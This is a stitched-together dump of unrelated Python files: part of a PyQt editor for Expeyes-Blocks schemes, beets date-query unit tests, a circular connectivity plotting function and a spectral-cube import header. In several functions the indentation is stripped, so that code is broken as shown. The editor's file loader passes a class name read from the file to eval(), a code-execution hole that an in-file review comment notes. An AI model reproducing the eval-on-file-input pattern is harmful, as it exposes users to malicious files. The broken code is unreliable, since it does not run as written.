        Compile the current scheme to a working application.
        :returns: the path to the main python program.
        """
        import os, os.path
        # save the file if necessary
        if self.dirty=="*": self.save()
        # Build into build/<scheme name without .eyeblk extension>/
        fileNameShorted=os.path.basename(str(self.fileName)).replace(".eyeblk","")
        directory=os.path.join("build", fileNameShorted)
        try:
            os.makedirs(directory, mode=0o755)
        except:
            # NOTE(review): bare except — presumably tolerates an already
            # existing directory, but it also hides permission errors.
            pass
        # Warn before overwriting the products of a previous build.
        l=os.listdir(directory)
        l=QStringList(l)
        ok=True
        if l:
            ok=QMessageBox.question(self,
                _translate("eyeBlocks.mainwindow","OK to erase a previous build?",None),
                _translate("eyeBlocks.mainwindow","Here are some previous built files:\n %1\nDo you really want to overwrite them?",None).arg(
                    l.join(", ")),
                QMessageBox.No|QMessageBox.Yes
                ) == QMessageBox.Yes
        if not ok: return
        return wizard.compile_(self, directory)
    def run(self):
        """
        Compile the current scheme to a working application,
        and run it in a detached thread
        """
        program=self.compile_()
        wizard.run(program)
        return
    def chooseBox(self, model):
        """
        choose the targetted box
        :param model: the target model
        :type model: str
        :returns: a zero-argument callback suitable for a QAction signal
        """
        def callBack():
            # NOTE(review): __init__ sets self.widget.boxModel; this sets
            # self.boxModel — likely one of the two is a bug, confirm.
            self.boxModel=model
            self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[New targetted box]</span> %1",None).arg(model))
            return
        return callBack
    def about(self):
        """
        brings up the About dialog
        """
        QMessageBox.about(self,_translate("eyeBlocks.mainwindow","About",None), license)
        return
    def aboutQt(self):
        """
        brings up the About Qt dialog
        """
        QMessageBox.aboutQt(self,_translate("eyeBlocks.mainwindow","About Qt",None))
        return
    # Patterns for the three record types of the .eyeblk file format:
    # a version header, then repeated (class-name header, class name,
    # blob header, binary blob) groups.
    versionPattern=re.compile(r"^Expeyes-Blocks version ([\.\d]+)$")
    classPattern  =re.compile(r"^Class Name \((\d+) bytes\)$")
    blobPattern   =re.compile(r"^Blob \((\d+) bytes\)$")
    def load(self):
        """
        Loads a component composition
        """
        fileName=QFileDialog.getOpenFileName(self,
            _translate("eyeBlocks.mainwindow","Open a file",None),
            filter=_translate("eyeBlocks.mainwindow","Expeyes-Blocks: *.eyeblk (*.eyeblk);;All files: * (*)",None)
        )
        self.loadFile(fileName)
        return
    def loadFile(self, fileName):
        """
        Loads a component composition
        :param fileName: a file of saved data
        :type fileName: str or QString
        """
        ok=False
        cur=0
        with open(fileName,"rb") as instream:
            # First line: "Expeyes-Blocks version X.Y"
            s=instream.readline()
            thisVersion=self.versionPattern.match(s).group(1)
            # take a decision about thisVersion
            components=[]
            nameSize = instream.readline()
            while nameSize:
                # Header gives the byte length of the class name that follows.
                size=int(self.classPattern.match(nameSize).group(1))
                className=instream.readline().strip()
                if len(className) != size:
                    raise Exception(_translate("eyeBlocks.mainwindow","Error size: %s does not match %s",None) %(size, className))
                s=instream.readline()
                blobSize=int(self.blobPattern.match(s).group(1))
                blob=QByteArray(instream.read(blobSize))
                # NOTE(review): eval() on a class name read from the file —
                # this trusts the .eyeblk content; a malicious file could
                # execute arbitrary code.
                obj, dataStream, className = eval("%s.unserialize(blob)" %className)
                components.append(obj)
                # prepare next iteration
                nameSize = instream.readline()
        if components:
            ok=True
            # restore components in the right pannel
            self.widget.components=components
            self.widget.connectSnaps()
            self.widget.update()
            # restore list items in the left pannel
            for c in components:
                self.componentsList.hideItem(c)
        if ok:
            self.fileName=fileName
            self.dirty=""
            self.setWindowTitle(self.currentTitle())
            self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Loaded file]</span> %1",None).arg(fileName))
        return
    def save(self):
        """
        Saves the current component composition
        """
        if self.fileName:
            with open(self.fileName,"wb") as outstream:
                # Version header first, then each component serializes itself.
                outstream.write("Expeyes-Blocks version %s\n" %version)
                for c in self.widget.components:
                    c.save(outstream)
            self.dirty=""
            self.setWindowTitle(self.currentTitle())
            self.warn(_translate("eyeBlocks.mainwindow","<span style='color:blue'>[Saved file]</span> %1",None).arg(self.fileName))
        else:
            self.saveAs()
        return
    def saveAs(self, fileName=None):
        """
        Saves the current component composition in a new file
        :param fileName: name of the file, defaults to None
        :type fileName: str or QString
        """
        if fileName: self.fileName=fileName
        if not self.fileName:
            self.fileName = _translate("eyeBlocks.mainwindow","untitled.eyeblk",None)
        self.fileName=QFileDialog.getSaveFileName(
            self, _translate("eyeBlocks.mainwindow","Save to file",None), self.fileName,
            filter = _translate("eyeBlocks.mainwindow","Expeyes-Blocks: *.eyeblk (*.eyeblk);;All files: * (*)",None)
        )
        # An empty fileName means the dialog was cancelled: do nothing.
        if self.fileName:
            self.save()
        return
    def makeDirty(self):
        # Flag unsaved changes; reflected as "*" in the window title.
        self.dirty="*"
        self.setWindowTitle(self.currentTitle())
        return
    def closeEvent(self, event):
        # Ask for confirmation when closing with unsaved changes.
        ok = True
        if self.dirty:
            ok=QMessageBox.question(
                self, _translate("eyeBlocks.mainwindow","Please confirm",None),
                _translate("eyeBlocks.mainwindow","""\
The current work is not yet saved,
do you really want to quit the application?
""",None),
                QMessageBox.Yes|QMessageBox.No) == QMessageBox.Yes
        if ok:
            QMainWindow.closeEvent(self,event)
            event.accept() # let the window close
        else:
            event.ignore()
        return
    def currentTitle(self):
        """
        :returns: the current title of the main window, taking in account the file name and a dirty flag.
        :rtype: str
        """
        return "Blocks (%s)%s" %(basename(str(self.fileName)), self.dirty)
    def warn(self, text):
        """
        appends a warning to the messages, and adds a line break.
        :param text: the warning to display, with HTML syntax.
        :type text: QString or str
        """
        self.messages.insertHtml(text)
        self.messages.insertHtml("<br>")
        self.messages.ensureCursorVisible ()
        return
| |
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Test for dbcore's date-based queries.
"""
from test import _common
from datetime import datetime, timedelta
import unittest
import time
from beets.dbcore.query import _parse_periods, DateInterval, DateQuery,\
InvalidQueryArgumentValueError
def _date(string):
return datetime.strptime(string, '%Y-%m-%dT%H:%M:%S')
def _datepattern(datetimedate):
return datetimedate.strftime('%Y-%m-%dT%H:%M:%S')
class DateIntervalTest(unittest.TestCase):
    # Each pattern like '2000..2001' denotes an inclusive interval at the
    # precision written: '2000..2001' covers all of both years, open ends
    # ('2000..', '..2001') are unbounded, and '-1d..1d' is relative to now.
    def test_year_precision_intervals(self):
        self.assertContains('2000..2001', '2000-01-01T00:00:00')
        self.assertContains('2000..2001', '2001-06-20T14:15:16')
        self.assertContains('2000..2001', '2001-12-31T23:59:59')
        self.assertExcludes('2000..2001', '1999-12-31T23:59:59')
        self.assertExcludes('2000..2001', '2002-01-01T00:00:00')
        self.assertContains('2000..', '2000-01-01T00:00:00')
        self.assertContains('2000..', '2099-10-11T00:00:00')
        self.assertExcludes('2000..', '1999-12-31T23:59:59')
        self.assertContains('..2001', '2001-12-31T23:59:59')
        self.assertExcludes('..2001', '2002-01-01T00:00:00')
        # Relative intervals (days around "now").
        self.assertContains('-1d..1d', _datepattern(datetime.now()))
        self.assertExcludes('-2d..-1d', _datepattern(datetime.now()))
    def test_day_precision_intervals(self):
        self.assertContains('2000-06-20..2000-06-20', '2000-06-20T00:00:00')
        self.assertContains('2000-06-20..2000-06-20', '2000-06-20T10:20:30')
        self.assertContains('2000-06-20..2000-06-20', '2000-06-20T23:59:59')
        self.assertExcludes('2000-06-20..2000-06-20', '2000-06-19T23:59:59')
        self.assertExcludes('2000-06-20..2000-06-20', '2000-06-21T00:00:00')
    def test_month_precision_intervals(self):
        self.assertContains('1999-12..2000-02', '1999-12-01T00:00:00')
        self.assertContains('1999-12..2000-02', '2000-02-15T05:06:07')
        self.assertContains('1999-12..2000-02', '2000-02-29T23:59:59')
        self.assertExcludes('1999-12..2000-02', '1999-11-30T23:59:59')
        self.assertExcludes('1999-12..2000-02', '2000-03-01T00:00:00')
    def test_hour_precision_intervals(self):
        # test with 'T' separator
        self.assertExcludes('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T11:59:59')
        self.assertContains('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T12:00:00')
        self.assertContains('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T12:30:00')
        self.assertContains('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T13:30:00')
        self.assertContains('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T13:59:59')
        self.assertExcludes('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T14:00:00')
        self.assertExcludes('2000-01-01T12..2000-01-01T13',
                            '2000-01-01T14:30:00')
        # test non-range query
        self.assertContains('2008-12-01T22',
                            '2008-12-01T22:30:00')
        self.assertExcludes('2008-12-01T22',
                            '2008-12-01T23:30:00')
    def test_minute_precision_intervals(self):
        self.assertExcludes('2000-01-01T12:30..2000-01-01T12:31',
                            '2000-01-01T12:29:59')
        self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
                            '2000-01-01T12:30:00')
        self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
                            '2000-01-01T12:30:30')
        self.assertContains('2000-01-01T12:30..2000-01-01T12:31',
                            '2000-01-01T12:31:59')
        self.assertExcludes('2000-01-01T12:30..2000-01-01T12:31',
                            '2000-01-01T12:32:00')
    def test_second_precision_intervals(self):
        self.assertExcludes('2000-01-01T12:30:50..2000-01-01T12:30:55',
                            '2000-01-01T12:30:49')
        self.assertContains('2000-01-01T12:30:50..2000-01-01T12:30:55',
                            '2000-01-01T12:30:50')
        self.assertContains('2000-01-01T12:30:50..2000-01-01T12:30:55',
                            '2000-01-01T12:30:55')
        self.assertExcludes('2000-01-01T12:30:50..2000-01-01T12:30:55',
                            '2000-01-01T12:30:56')
    def test_unbounded_endpoints(self):
        # '..' alone matches every representable datetime.
        self.assertContains('..', date=datetime.max)
        self.assertContains('..', date=datetime.min)
        self.assertContains('..', '1000-01-01T00:00:00')
    def assertContains(self, interval_pattern, date_pattern=None, date=None):  # noqa
        # Helper: parse the pattern into a DateInterval and assert membership.
        # Accepts either a pattern string or a ready datetime via `date`.
        if date is None:
            date = _date(date_pattern)
        (start, end) = _parse_periods(interval_pattern)
        interval = DateInterval.from_periods(start, end)
        self.assertTrue(interval.contains(date))
    def assertExcludes(self, interval_pattern, date_pattern):  # noqa
        # Helper: mirror of assertContains for non-membership.
        date = _date(date_pattern)
        (start, end) = _parse_periods(interval_pattern)
        interval = DateInterval.from_periods(start, end)
        self.assertFalse(interval.contains(date))
def _parsetime(s):
return time.mktime(datetime.strptime(s, '%Y-%m-%d %H:%M').timetuple())
class DateQueryTest(_common.LibTestCase):
    """Date queries against a library item added at a fixed timestamp."""

    def setUp(self):
        super().setUp()
        self.i.added = _parsetime('2013-03-30 22:21')
        self.i.store()

    def test_single_month_match_fast(self):
        # "fast" path: the query runs as SQL against the library.
        matched = self.lib.items(DateQuery('added', '2013-03'))
        self.assertEqual(len(matched), 1)

    def test_single_month_nonmatch_fast(self):
        matched = self.lib.items(DateQuery('added', '2013-04'))
        self.assertEqual(len(matched), 0)

    def test_single_month_match_slow(self):
        # "slow" path: match() is evaluated in Python on the item itself.
        self.assertTrue(DateQuery('added', '2013-03').match(self.i))

    def test_single_month_nonmatch_slow(self):
        self.assertFalse(DateQuery('added', '2013-04').match(self.i))

    def test_single_day_match_fast(self):
        matched = self.lib.items(DateQuery('added', '2013-03-30'))
        self.assertEqual(len(matched), 1)

    def test_single_day_nonmatch_fast(self):
        matched = self.lib.items(DateQuery('added', '2013-03-31'))
        self.assertEqual(len(matched), 0)
class DateQueryTestRelative(_common.LibTestCase):
    """DateQuery matching with patterns derived from a fixed reference
    datetime (rather than hard-coded strings)."""

    def setUp(self):
        super().setUp()
        # We pick a date near a month changeover, which can reveal some time
        # zone bugs.
        self._now = datetime(2017, 12, 31, 22, 55, 4, 101332)
        self.i.added = _parsetime(self._now.strftime('%Y-%m-%d %H:%M'))
        self.i.store()

    def test_single_month_match_fast(self):
        query = DateQuery('added', self._now.strftime('%Y-%m'))
        matched = self.lib.items(query)
        self.assertEqual(len(matched), 1)

    def test_single_month_nonmatch_fast(self):
        # 30 days past Dec 31 is always in a different month.
        query = DateQuery('added', (self._now + timedelta(days=30))
                          .strftime('%Y-%m'))
        matched = self.lib.items(query)
        self.assertEqual(len(matched), 0)

    def test_single_month_match_slow(self):
        query = DateQuery('added', self._now.strftime('%Y-%m'))
        self.assertTrue(query.match(self.i))

    def test_single_month_nonmatch_slow(self):
        query = DateQuery('added', (self._now + timedelta(days=30))
                          .strftime('%Y-%m'))
        self.assertFalse(query.match(self.i))

    def test_single_day_match_fast(self):
        query = DateQuery('added', self._now.strftime('%Y-%m-%d'))
        matched = self.lib.items(query)
        self.assertEqual(len(matched), 1)

    def test_single_day_nonmatch_fast(self):
        query = DateQuery('added', (self._now + timedelta(days=1))
                          .strftime('%Y-%m-%d'))
        matched = self.lib.items(query)
        self.assertEqual(len(matched), 0)
class DateQueryTestRelativeMore(_common.LibTestCase):
    """Relative date query patterns ('-4d..+4d', '..-4y', etc.) against an
    item whose ``added`` time is the current moment.

    The timespan suffixes are d=days, w=weeks, m=months, y=years —
    presumably; confirm against the DateQuery parser.
    """

    def setUp(self):
        super().setUp()
        self.i.added = _parsetime(datetime.now().strftime('%Y-%m-%d %H:%M'))
        self.i.store()

    def test_relative(self):
        # A window spanning "now" must match the just-added item.
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '-4' + timespan + '..+4' + timespan)
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 1)

    def test_relative_fail(self):
        # A window entirely in the past must not match.
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '-2' + timespan + '..-1' + timespan)
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 0)

    def test_start_relative(self):
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '-4' + timespan + '..')
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 1)

    def test_start_relative_fail(self):
        # A start bound in the future excludes the just-added item.
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '4' + timespan + '..')
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 0)

    def test_end_relative(self):
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '..+4' + timespan)
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 1)

    def test_end_relative_fail(self):
        # An end bound in the past excludes the just-added item.
        for timespan in ['d', 'w', 'm', 'y']:
            query = DateQuery('added', '..-4' + timespan)
            matched = self.lib.items(query)
            self.assertEqual(len(matched), 0)
class DateQueryConstructTest(unittest.TestCase):
    """Validation and parsing behavior of the DateQuery constructor:
    malformed patterns raise InvalidQueryArgumentValueError, and the
    'T'/'t'/space separators all parse to hour-precision intervals."""

    def test_long_numbers(self):
        # Raw epoch-second timestamps are rejected as date bounds.
        with self.assertRaises(InvalidQueryArgumentValueError):
            DateQuery('added', '1409830085..1412422089')

    def test_too_many_components(self):
        with self.assertRaises(InvalidQueryArgumentValueError):
            DateQuery('added', '12-34-56-78')

    def test_invalid_date_query(self):
        # Non-numeric characters anywhere in a date component are invalid.
        q_list = [
            '2001-01-0a',
            '2001-0a',
            '200a',
            '2001-01-01..2001-01-0a',
            '2001-0a..2001-01',
            '200a..2002',
            '20aa..',
            '..2aa'
        ]
        for q in q_list:
            with self.assertRaises(InvalidQueryArgumentValueError):
                DateQuery('added', q)

    def test_datetime_uppercase_t_separator(self):
        # Hour precision: the interval covers exactly one hour.
        date_query = DateQuery('added', '2000-01-01T12')
        self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
        self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))

    def test_datetime_lowercase_t_separator(self):
        date_query = DateQuery('added', '2000-01-01t12')
        self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
        self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))

    def test_datetime_space_separator(self):
        date_query = DateQuery('added', '2000-01-01 12')
        self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
        self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))

    def test_datetime_invalid_separator(self):
        with self.assertRaises(InvalidQueryArgumentValueError):
            DateQuery('added', '2000-01-01x12')
def suite():
    """Collect every test in this module for the test runner."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
# Run the full module test suite when the file is executed directly.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| |
"""Functions to plot on circle as for connectivity
"""
from __future__ import print_function
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
#
# License: Simplified BSD
from itertools import cycle
from functools import partial
import numpy as np
from .utils import plt_show
from ..externals.six import string_types
from ..fixes import tril_indices, normalize_colors
def circular_layout(node_names, node_order, start_pos=90, start_between=True,
                    group_boundaries=None, group_sep=10):
    """Create layout arranging nodes on a circle.

    Parameters
    ----------
    node_names : list of str
        Node names.
    node_order : list of str
        List with node names defining the order in which the nodes are
        arranged. Must have the elements as node_names but the order can be
        different. The nodes are arranged clockwise starting at "start_pos"
        degrees.
    start_pos : float
        Angle in degrees that defines where the first node is plotted.
    start_between : bool
        If True, the layout starts with the position between the nodes. This is
        the same as adding "180. / len(node_names)" to start_pos.
    group_boundaries : None | array-like
        List of boundaries between groups at which point a "group_sep" will
        be inserted. E.g. "[0, len(node_names) / 2]" will create two groups.
    group_sep : float
        Group separation angle in degrees. See "group_boundaries".

    Returns
    -------
    node_angles : array, shape=(len(node_names,))
        Node angles in degrees.

    Raises
    ------
    ValueError
        If ``node_order`` has the wrong length or repeated entries, or if
        ``group_boundaries`` is out of range or not strictly increasing.
    """
    n_nodes = len(node_names)

    if len(node_order) != n_nodes:
        raise ValueError('node_order has to be the same length as node_names')

    if group_boundaries is not None:
        # Use the builtin ``int`` dtype: ``np.int`` was a deprecated alias
        # for the builtin and was removed in numpy >= 1.24.
        boundaries = np.array(group_boundaries, dtype=int)
        if np.any(boundaries >= n_nodes) or np.any(boundaries < 0):
            raise ValueError('"group_boundaries" has to be between 0 and '
                             'n_nodes - 1.')
        if len(boundaries) > 1 and np.any(np.diff(boundaries) <= 0):
            raise ValueError('"group_boundaries" must have non-decreasing '
                             'values.')
        n_group_sep = len(group_boundaries)
    else:
        n_group_sep = 0
        boundaries = None

    # convert it to a list with indices
    node_order = [node_order.index(name) for name in node_names]
    node_order = np.array(node_order)
    if len(np.unique(node_order)) != n_nodes:
        raise ValueError('node_order has repeated entries')

    # angular distance between adjacent nodes after reserving group gaps
    node_sep = (360. - n_group_sep * group_sep) / n_nodes

    if start_between:
        start_pos += node_sep / 2

        if boundaries is not None and boundaries[0] == 0:
            # special case when a group separator is at the start
            start_pos += group_sep / 2
            boundaries = boundaries[1:] if n_group_sep > 1 else None

    # ``np.float`` was likewise removed; the builtin ``float`` is identical.
    node_angles = np.ones(n_nodes, dtype=float) * node_sep
    node_angles[0] = start_pos
    if boundaries is not None:
        node_angles[boundaries] += group_sep

    node_angles = np.cumsum(node_angles)[node_order]

    return node_angles
def _plot_connectivity_circle_onpick(event, fig=None, axes=None, indices=None,
n_nodes=0, node_angles=None,
ylim=[9, 10]):
"""Isolates connections around a single node when user left clicks a node.
On right click, resets all connections."""
if event.inaxes != axes:
return
if event.button == 1: # left click
# click must be near node radius
if not ylim[0] <= event.ydata <= ylim[1]:
return
# all angles in range [0, 2*pi]
node_angles = node_angles % (np.pi * 2)
node = np.argmin(np.abs(event.xdata - node_angles))
patches = event.inaxes.patches
for ii, (x, y) in enumerate(zip(indices[0], indices[1])):
patches[ii].set_visible(node in [x, y])
fig.canvas.draw()
elif event.button == 3: # right click
patches = event.inaxes.patches
for ii in range(np.size(indices, axis=1)):
patches[ii].set_visible(True)
fig.canvas.draw()
def plot_connectivity_circle(con, node_names, indices=None, n_lines=None,
                             node_angles=None, node_width=None,
                             node_colors=None, facecolor='black',
                             textcolor='white', node_edgecolor='black',
                             linewidth=1.5, colormap='hot', vmin=None,
                             vmax=None, colorbar=True, title=None,
                             colorbar_size=0.2, colorbar_pos=(-0.3, 0.1),
                             fontsize_title=12, fontsize_names=8,
                             fontsize_colorbar=8, padding=6.,
                             fig=None, subplot=111, interactive=True,
                             node_linewidth=2., show=True):
    """Visualize connectivity as a circular graph.

    Note: This code is based on the circle graph example by Nicolas P. Rougier
    http://www.labri.fr/perso/nrougier/coding/.

    Parameters
    ----------
    con : array
        Connectivity scores. Can be a square matrix, or a 1D array. If a 1D
        array is provided, "indices" has to be used to define the connection
        indices.
    node_names : list of str
        Node names. The order corresponds to the order in con.
    indices : tuple of arrays | None
        Two arrays with indices of connections for which the connections
        strengths are defined in con. Only needed if con is a 1D array.
    n_lines : int | None
        If not None, only the n_lines strongest connections (strength=abs(con))
        are drawn.
    node_angles : array, shape=(len(node_names,)) | None
        Array with node positions in degrees. If None, the nodes are equally
        spaced on the circle. See mne.viz.circular_layout.
    node_width : float | None
        Width of each node in degrees. If None, the minimum angle between any
        two nodes is used as the width.
    node_colors : list of tuples | list of str
        List with the color to use for each node. If fewer colors than nodes
        are provided, the colors will be repeated. Any color supported by
        matplotlib can be used, e.g., RGBA tuples, named colors.
    facecolor : str
        Color to use for background. See matplotlib.colors.
    textcolor : str
        Color to use for text. See matplotlib.colors.
    node_edgecolor : str
        Color to use for lines around nodes. See matplotlib.colors.
    linewidth : float
        Line width to use for connections.
    colormap : str
        Colormap to use for coloring the connections.
    vmin : float | None
        Minimum value for colormap. If None, it is determined automatically.
    vmax : float | None
        Maximum value for colormap. If None, it is determined automatically.
    colorbar : bool
        Display a colorbar or not.
    title : str
        The figure title.
    colorbar_size : float
        Size of the colorbar.
    colorbar_pos : 2-tuple
        Position of the colorbar.
    fontsize_title : int
        Font size to use for title.
    fontsize_names : int
        Font size to use for node names.
    fontsize_colorbar : int
        Font size to use for colorbar.
    padding : float
        Space to add around figure to accommodate long labels.
    fig : None | instance of matplotlib.pyplot.Figure
        The figure to use. If None, a new figure with the specified background
        color will be created.
    subplot : int | 3-tuple
        Location of the subplot when creating figures with multiple plots. E.g.
        121 or (1, 2, 1) for 1 row, 2 columns, plot 1. See
        matplotlib.pyplot.subplot.
    interactive : bool
        When enabled, left-click on a node to show only connections to that
        node. Right-click shows all connections.
    node_linewidth : float
        Line width for nodes.
    show : bool
        Show figure if True.

    Returns
    -------
    fig : instance of matplotlib.pyplot.Figure
        The figure handle.
    axes : instance of matplotlib.axes.PolarAxesSubplot
        The subplot handle.
    """
    # NOTE(review): this function uses `axisbg`, `plt.cm.spectral` and
    # `dtype=np.int`, all of which are removed in modern matplotlib/numpy.
    # The module appears pinned to older versions — confirm before upgrading.
    import matplotlib.pyplot as plt
    import matplotlib.path as m_path
    import matplotlib.patches as m_patches

    n_nodes = len(node_names)

    if node_angles is not None:
        if len(node_angles) != n_nodes:
            raise ValueError('node_angles has to be the same length '
                             'as node_names')
        # convert it to radians
        node_angles = node_angles * np.pi / 180
    else:
        # uniform layout on unit circle
        node_angles = np.linspace(0, 2 * np.pi, n_nodes, endpoint=False)

    if node_width is None:
        # widths correspond to the minimum angle between two nodes
        dist_mat = node_angles[None, :] - node_angles[:, None]
        dist_mat[np.diag_indices(n_nodes)] = 1e9
        node_width = np.min(np.abs(dist_mat))
    else:
        node_width = node_width * np.pi / 180

    if node_colors is not None:
        if len(node_colors) < n_nodes:
            node_colors = cycle(node_colors)
    else:
        # assign colors using colormap
        node_colors = [plt.cm.spectral(i / float(n_nodes))
                       for i in range(n_nodes)]

    # handle 1D and 2D connectivity information
    if con.ndim == 1:
        if indices is None:
            raise ValueError('indices has to be provided if con.ndim == 1')
    elif con.ndim == 2:
        if con.shape[0] != n_nodes or con.shape[1] != n_nodes:
            raise ValueError('con has to be 1D or a square matrix')
        # we use the lower-triangular part
        indices = tril_indices(n_nodes, -1)
        con = con[indices]
    else:
        raise ValueError('con has to be 1D or a square matrix')

    # get the colormap
    if isinstance(colormap, string_types):
        colormap = plt.get_cmap(colormap)

    # Make figure background the same colors as axes
    if fig is None:
        fig = plt.figure(figsize=(8, 8), facecolor=facecolor)

    # Use a polar axes
    if not isinstance(subplot, tuple):
        subplot = (subplot,)
    axes = plt.subplot(*subplot, polar=True, axisbg=facecolor)

    # No ticks, we'll put our own
    plt.xticks([])
    plt.yticks([])

    # Set y axes limit, add additional space if requested
    plt.ylim(0, 10 + padding)

    # Remove the black axes border which may obscure the labels
    axes.spines['polar'].set_visible(False)

    # Draw lines between connected nodes, only draw the strongest connections
    if n_lines is not None and len(con) > n_lines:
        con_thresh = np.sort(np.abs(con).ravel())[-n_lines]
    else:
        con_thresh = 0.

    # get the connections which we are drawing and sort by connection strength
    # this will allow us to draw the strongest connections first
    con_abs = np.abs(con)
    con_draw_idx = np.where(con_abs >= con_thresh)[0]

    con = con[con_draw_idx]
    con_abs = con_abs[con_draw_idx]
    indices = [ind[con_draw_idx] for ind in indices]

    # now sort them
    sort_idx = np.argsort(con_abs)
    con_abs = con_abs[sort_idx]
    con = con[sort_idx]
    indices = [ind[sort_idx] for ind in indices]

    # Get vmin vmax for color scaling
    if vmin is None:
        vmin = np.min(con[np.abs(con) >= con_thresh])
    if vmax is None:
        vmax = np.max(con)
    vrange = vmax - vmin

    # We want to add some "noise" to the start and end position of the
    # edges: We modulate the noise with the number of connections of the
    # node and the connection strength, such that the strongest connections
    # are closer to the node center
    nodes_n_con = np.zeros((n_nodes), dtype=np.int)
    for i, j in zip(indices[0], indices[1]):
        nodes_n_con[i] += 1
        nodes_n_con[j] += 1

    # initialize random number generator so plot is reproducible
    rng = np.random.mtrand.RandomState(seed=0)

    n_con = len(indices[0])
    noise_max = 0.25 * node_width
    start_noise = rng.uniform(-noise_max, noise_max, n_con)
    end_noise = rng.uniform(-noise_max, noise_max, n_con)

    nodes_n_con_seen = np.zeros_like(nodes_n_con)
    for i, (start, end) in enumerate(zip(indices[0], indices[1])):
        nodes_n_con_seen[start] += 1
        nodes_n_con_seen[end] += 1

        # shrink the noise for later (stronger, since sorted) connections
        start_noise[i] *= ((nodes_n_con[start] - nodes_n_con_seen[start]) /
                           float(nodes_n_con[start]))
        end_noise[i] *= ((nodes_n_con[end] - nodes_n_con_seen[end]) /
                         float(nodes_n_con[end]))

    # scale connectivity for colormap (vmin<=>0, vmax<=>1)
    con_val_scaled = (con - vmin) / vrange

    # Finally, we draw the connections
    for pos, (i, j) in enumerate(zip(indices[0], indices[1])):
        # Start point
        t0, r0 = node_angles[i], 10

        # End point
        t1, r1 = node_angles[j], 10

        # Some noise in start and end point
        t0 += start_noise[pos]
        t1 += end_noise[pos]

        # cubic Bezier through the circle interior (radius 5 control points)
        verts = [(t0, r0), (t0, 5), (t1, 5), (t1, r1)]
        codes = [m_path.Path.MOVETO, m_path.Path.CURVE4, m_path.Path.CURVE4,
                 m_path.Path.LINETO]
        path = m_path.Path(verts, codes)

        color = colormap(con_val_scaled[pos])

        # Actual line
        patch = m_patches.PathPatch(path, fill=False, edgecolor=color,
                                    linewidth=linewidth, alpha=1.)
        axes.add_patch(patch)

    # Draw ring with colored nodes
    height = np.ones(n_nodes) * 1.0
    bars = axes.bar(node_angles, height, width=node_width, bottom=9,
                    edgecolor=node_edgecolor, lw=node_linewidth,
                    facecolor='.9', align='center')

    for bar, color in zip(bars, node_colors):
        bar.set_facecolor(color)

    # Draw node labels
    angles_deg = 180 * node_angles / np.pi
    for name, angle_rad, angle_deg in zip(node_names, node_angles, angles_deg):
        if angle_deg >= 270:
            ha = 'left'
        else:
            # Flip the label, so text is always upright
            angle_deg += 180
            ha = 'right'

        axes.text(angle_rad, 10.4, name, size=fontsize_names,
                  rotation=angle_deg, rotation_mode='anchor',
                  horizontalalignment=ha, verticalalignment='center',
                  color=textcolor)

    if title is not None:
        plt.title(title, color=textcolor, fontsize=fontsize_title,
                  axes=axes)

    if colorbar:
        norm = normalize_colors(vmin=vmin, vmax=vmax)
        sm = plt.cm.ScalarMappable(cmap=colormap, norm=norm)
        sm.set_array(np.linspace(vmin, vmax))
        cb = plt.colorbar(sm, ax=axes, use_gridspec=False,
                          shrink=colorbar_size,
                          anchor=colorbar_pos)
        cb_yticks = plt.getp(cb.ax.axes, 'yticklabels')
        cb.ax.tick_params(labelsize=fontsize_colorbar)
        plt.setp(cb_yticks, color=textcolor)

    # Add callback for interaction
    if interactive:
        callback = partial(_plot_connectivity_circle_onpick, fig=fig,
                           axes=axes, indices=indices, n_nodes=n_nodes,
                           node_angles=node_angles)

        fig.canvas.mpl_connect('button_press_event', callback)

    plt_show(show)
    return fig, axes
| |
from __future__ import print_function, absolute_import, division
import warnings
import numpy as np
from numpy.ma.core import nomask
from astropy import convolution
from astropy import units as u
from astropy import wcs
#from astropy import log
from astropy.io.fits import Header, HDUList, PrimaryHDU, BinTableHDU, FITS_rec
from radio_beam import Beam, Beams
from astropy.io.registry import UnifiedReadWriteMethod
from . import spectral_axis
from .io.core import LowerDimensionalObjectWrite
from .utils import SliceWarning, BeamWarning, SmoothingWarning, FITSWarning
from .cube_utils import convert_bunit
from . import wcs_utils
from .masks import BooleanArrayMask, MaskBase
from .base_class import (BaseNDClass, SpectralAxisMixinClass,
SpatialCoordMixinClass, MaskableArrayMixinClass,
MultiBeamMixinClass, BeamMixinClass,
HeaderMixinClass
)
from . import cube_utils
